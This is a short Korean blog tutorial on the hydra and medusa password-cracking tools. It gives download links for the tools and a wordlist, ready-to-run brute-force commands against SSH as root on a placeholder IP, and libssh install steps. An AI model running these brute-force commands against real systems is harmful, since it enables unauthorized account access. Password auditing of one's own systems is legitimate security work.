hydra, medusa 는 패스워드 크랙툴이면서 동시에 시스템 감사(auditor) 도구이기도 하다.
brute-force 방식으로 패스워드가 될 만한 워드리스트를 무식하게 대입하여 로그인을 시도한다.
병렬처리로 빠르고 telnet, ftp, ssh, 인터넷 공유기 등의 암호 크랙에 사용된다.
# hydra 소스 다운로드 http://www.thc.org/releases/hydra-7.4.2.tar.gz
# medusa 소스 다운로드 http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
# password list 다운로드 http://dazzlepod.com/site_media/txt/passwords.txt
# yum(Redhat계열), apt-get(Debian계열), port(OSX) 로도 설치 가능
# hydra 기본 사용법
# -l 사용자명
# -P 패스워드리스트 파일
# 서버명
# 서비스형식
# -V 시도하고 있는 id/password 화면에 보이기
# -f 패스워들 찾았으면 종료
hydra -l root -P passwords.txt 123.123.123.123 ssh -V -f
# medusa 기본 사용법
# -h 호스트명
# -u 사용자명
# -P 패스워드리스트 파일
# -M 사용모듈(medusa -d 로 확인 가능) ssh 모듈이 없다면 libssh 설치
medusa -h 123.123.123.123 -u root -P passwords.txt -M ssh
# libssh 설치
# port 이용시
sudo port install libssh2
# apt-get 이용시
sudo apt-get install libssh-dev
# 그외 http://www.libssh2.org/ 에서 다운받고 빌드및 설치
comments:
댓글 쓰기